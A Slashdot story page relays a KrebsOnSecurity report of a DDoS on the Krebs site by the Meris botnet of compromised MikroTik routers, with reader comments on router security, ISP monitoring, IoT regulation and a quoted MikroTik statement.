Krebs Also Hit By Massive DDOS, Apparently Caused by Compromised Routers (krebsonsecurity.com) 31
"On Thursday evening, KrebsOnSecurity was the subject of a rather massive (and mercifully brief) distributed denial-of-service (DDoS) attack," the site reports.
Citing a new blog post from DDoS protection firm Qrator Labs, Krebs writes that "The assault came from 'Meris,' the same new botnet behind record-shattering attacks against Russian search giant Yandex this week and internet infrastructure firm Cloudflare earlier this summer." A titanic and ongoing DDoS that hit Russian Internet search giant Yandex last week is estimated to have been launched by roughly 250,000 malware-infected devices globally, sending 21.8 million bogus requests-per-second. While last night's Meris attack on this site was far smaller than the recent Cloudflare DDoS, it was far larger than the Mirai DDoS attack in 2016 that held KrebsOnSecurity offline for nearly four days. The traffic deluge from Thursday's attack on this site was more than four times what Mirai threw at this site five years ago. This latest attack involved more than two million requests-per-second. By comparison, the 2016 Mirai DDoS generated approximately 450,000 requests-per-second.
According to Qrator, which is working with Yandex on combating the attack, Meris appears to be made up of Internet routers produced by MikroTik. Qrator says the United States is home to the most number of MikroTik routers that are potentially vulnerable to compromise by Meris — with more than 42 percent of the world's MikroTik systems connected to the Internet (followed by China — 18.9 percent- and a long tail of one- and two-percent countries). It's not immediately clear which security vulnerabilities led to these estimated 250,000 MikroTik routers getting hacked by Meris. "The spectrum of RouterOS versions we see across this botnet varies from years old to recent," the company wrote. "The largest share belongs to the version of firmware previous to the current stable one."
Krebs writes that the biggest contributor to the IoT botnet problem remains "a plethora of companies white-labeling [cheap] IoT devices that were never designed with security in mind and are often shipped to the customer in default-insecure states...
"The good news is that over the past five years, large Internet infrastructure companies like Akamai, Cloudflare and Google (which protects this site with its Project Shield initiative) have heavily invested in ramping up their ability to withstand these outsized attacks..."
One year earlier, back in 2015, Krebs had answered questions from Slashdot's readers.
Citing a new blog post from DDoS protection firm Qrator Labs, Krebs writes that "The assault came from 'Meris,' the same new botnet behind record-shattering attacks against Russian search giant Yandex this week and internet infrastructure firm Cloudflare earlier this summer." A titanic and ongoing DDoS that hit Russian Internet search giant Yandex last week is estimated to have been launched by roughly 250,000 malware-infected devices globally, sending 21.8 million bogus requests-per-second. While last night's Meris attack on this site was far smaller than the recent Cloudflare DDoS, it was far larger than the Mirai DDoS attack in 2016 that held KrebsOnSecurity offline for nearly four days. The traffic deluge from Thursday's attack on this site was more than four times what Mirai threw at this site five years ago. This latest attack involved more than two million requests-per-second. By comparison, the 2016 Mirai DDoS generated approximately 450,000 requests-per-second.
According to Qrator, which is working with Yandex on combating the attack, Meris appears to be made up of Internet routers produced by MikroTik. Qrator says the United States is home to the most number of MikroTik routers that are potentially vulnerable to compromise by Meris — with more than 42 percent of the world's MikroTik systems connected to the Internet (followed by China — 18.9 percent- and a long tail of one- and two-percent countries). It's not immediately clear which security vulnerabilities led to these estimated 250,000 MikroTik routers getting hacked by Meris. "The spectrum of RouterOS versions we see across this botnet varies from years old to recent," the company wrote. "The largest share belongs to the version of firmware previous to the current stable one."
Krebs writes that the biggest contributor to the IoT botnet problem remains "a plethora of companies white-labeling [cheap] IoT devices that were never designed with security in mind and are often shipped to the customer in default-insecure states...
"The good news is that over the past five years, large Internet infrastructure companies like Akamai, Cloudflare and Google (which protects this site with its Project Shield initiative) have heavily invested in ramping up their ability to withstand these outsized attacks..."
One year earlier, back in 2015, Krebs had answered questions from Slashdot's readers.
Re: (Score:2)
Re: (Score:3)
Go take a long walk off a short pier, the world would be a better place without your brand of hate in it.
Except that then there would be a ring around the ocean.
Question (Score:4, Interesting)
Let's assume your home router has been compromised and is now part of one of these botnets. The criminals use your router as part of their DDOS. Wouldn't your ISP see the massive amount of sustained traffic pouring out of your router and block you until they figure out what you're doing?
This question presumes you're in a country which has decent providers, not some place such as India or Russia.
Re: (Score:3, Insightful)
Let's assume your home router has been compromised and is now part of one of these botnets. The criminals use your router as part of their DDOS. Wouldn't your ISP see the massive amount of sustained traffic pouring out of your router and block you until they figure out what you're doing?
Mikrotik gear is often used internally by ISPs because it is cheap and reasonably capable. Likely there is no substantial increase in bandwidth utilization locally. These are not bandwidth flood attacks they are resource exhaustion attacks.
Re: (Score:2)
The problem is a lot of home routers are provided by the ISP - either built into the modem they give you, or as an
Dealing with this stuff properly (Score:3)
So, what is the best way to deal with security on your router/firewall box today, with the presumption that you cannot trust the vendor? Can you layer in a bridge-mode / transparent firewall, or does that actually make things less secure.
Today to have a functioning network your router just has a huge attack surface.
Re: (Score:2)
Find one you trust and then restrict access to management functions.
Close. I do trust MikroTik, as a reputable maker, providing very flexible equipment. Still, nothing should be assumed of absolute security nowadays.
Devices and software are extremely complicated, and usually it is matter of time and effort to spot vulnerability.
Since there was position of gateway to fill recently, I was reviewing MikroTik vulnerabilities known to date, and they were not many so far.
Proceeded with this maker as a solution. One thing, that is not there out of the box in full fledge, is rulese
Re: (Score:3)
These good firewall examples that can easily be found online that you speak of
It feels like almost all of them are completely obsolete. I was troubleshooting a VPN problem the other day which forced me to watch tcpdump for a few hours. The first scary thing is just how many trackers there are on things today and the risks they pose. Then all the other crap comes out.
Beyond stateful firewalls and blocking a handful of high-risk ports, there really aren’t a lot of current recommendations out there th
Re: (Score:2)
You could well restrict who is to be communicated with, isn't it. Sure, sky is the limit, if to elaborate what could be in the place of your gateway/firewall.
But this can quickly come to an expense. I have just quoted what would be the maintenance cost for keeping smarter Checkpoint 3600 unit for my client,
ant it came to an annual fee over 3K Eur - which will be overkill for this small business. Some entities may care to spend this and even more, but not every.
It may evolve into several directions of narrow
Re: (Score:2)
You can do that stuff with a $200-500 Ubiquiti EdgeRouter as well, blocking user X from all social media systems or whatever. The problem is these are essentially HR restrictions and not security enhancements. Inbound protection is really limited, in practical terms. It has a significant impact on productivity, usefulness, and honestly very little security benefit.
Defense in depth is the mantra but there are few good defenses for your edge firewall.
Re: (Score:2)
Can't comment Ubiquity unit, as do not use them, but with MikroTik you have fine enough control over your incoming: you open up only what is desired to be open, you lock down to known trusty IP whatever left necessary, you sit behind NAT to keep on the response side, rather than that of plain incoming, you mention as a concern. Can't quite see where is the essence of fundamental problem. My experience shows, that most challenging spot, out of our control, is the mailbox - delivering whatever to the very des
Re: (Score:1)
Those are good ideas but...
The majority of customers out there are NOT TECH SAVVY and simply want something they can "plug in and forget about" and pay someone else to install...and then forget to pay ongoing maintenance to keep it up-to-date.
Think about it this way: How many people actually change the filter in their water filter? Clean out the drip tray under their refrigerators? Change the filter in their air conditioning-heating system? Change the air and oil filters in their car, less they go to one of
Re: (Score:2)
Sure, they will need to outsource engineers to do engineering stuff. MikroTik is for networking designs more than for the consumption.
Casual consumers hardly will know the very brand and its products. You still need professionals to design a bridge, fix your teeth or provide lawyer service.
Nothing wrong to know there are limits on DIY.
Re: (Score:1)
Sure, they will need to outsource engineers to do engineering stuff. MikroTik is for networking designs more than for the consumption. Casual consumers hardly will know the very brand and its products. You still need professionals to design a bridge, fix your teeth or provide lawyer service. Nothing wrong to know there are limits on DIY.
I agree with your comments. Sadly, most typical users either: (1) take it out of the box, read a page or two in the manual, then plug it in and change enough to get it working; or, (2) they pay someone to set it up but do not bother doing any ongoing maintenance like updating passwords, rules, firmware, etc. The tl;dr of the rest of this post is: Most end users make poor choices when it comes to device security and then try to blame others to hide their own shortcomings.
As some may have mentioned, some "wre
Re: (Score:2)
OK, I see you are still attempting to come to this from the consumer point (how to close this emerging gap, where engineering capabilities are not to be even expected). Which is, surprisingly, correct in the long run, as many products of computing are landing about there, as products for the particular consumer: like, what is your Microsoft account or Apple ID, and let's start things from there.
This does annoy folks like me, who were following evolution of fundamental computing, much less computing as a fo
Re: (Score:1)
I have been looking at MikroTik for my home and for my employer's place.
They seem good value for money compared to other brands and have decent functionality and support.
I might still get some gear from them eventually after further research.
Not Caused by Compromised Routers (Score:3)
The router is a tool. The DDOS was caused by a person that compromised the router.
The overall cause is hackers, the vendors making crappy IOT devices and Congress. We elect Congress to legislate on just this kind of thing.
Federal law should prohibit the importation of IOT devices that can't be secured and maybe federal law should prohibit connecting an insecure IOT devices to the internet.
Re: (Score:2)
Federal law should prohibit the importation of IOT devices that can't be secured and maybe federal law should prohibit connecting an insecure IOT devices to the internet.
Your insecure computer is causing money leakage.* Disconnect!
*Piracy.
Re: (Score:2)
OK, let's create a law that prohibits the connecting of an "insecure IOT device" to the internet.
Question for 100: What is an "insecure IOT device"?
I have a hunch, given our legislators, the answer is "whoever doesn't pay enough of a kickback and/or doesn't get some governmental stamp of approval".
Careful what you wish for. Especially when it comes to laws.
Re: (Score:1)
Re: (Score:2)
I’m fine with insecure crappy IoT devices; what the ESP8266 has given us can be great. The problem is when they need to connect to the internet to function, and cannot be isolated in an IoT cage.
mikrotik response (Score:3, Informative)
QUOTE
Many of you have asked, what is this Mris botnet that some news outlets are discussing right now, and if there is any new vulnerability in RouterOS.
As far as we have seen, these attacks use the same routers that were compromised in 2018, when MikroTik RouterOS had a vulnerability, that was quickly patched.
Unfortunately, closing the vulnerability does not immediately protect these routers. If somebody got your password in 2018, just an upgrade will not help. You must also change password, re-check your firewall if it does not allow remote access to unknown parties, and look for scripts that you did not create.
We have tried to reach all users of RouterOS about this, but many of them have never been in contact with MikroTik and are not actively monitoring their devices. We are working on other solutions too.
As far as we know right now - There are no new vulnerabilities in these devices. RouterOS has been recently independently audited by several contractors.
If you do see a RouterOS device that has malicious scripts or SOCKS configuration that was not created by you, especially if this configuration APPEARED NOW, RECENTLY, WHILE RUNNING A NEW ROUTEROS RELEASE: Please contact us immediately.
The problem is the internet (Score:2)
If internet governance actually existed and mandated ingress/egress filtering for all ISPs AND had a mechanism for pushing filter rules upstream by the owner of an IP range to ISPs of a given attacker, none of this would be a problem. The ISP of a compromised customer would get a lot of filter rules pushed on them, get pissed about it and do something about it.
Aren't most IoT devices behind a NAT? (Score:3)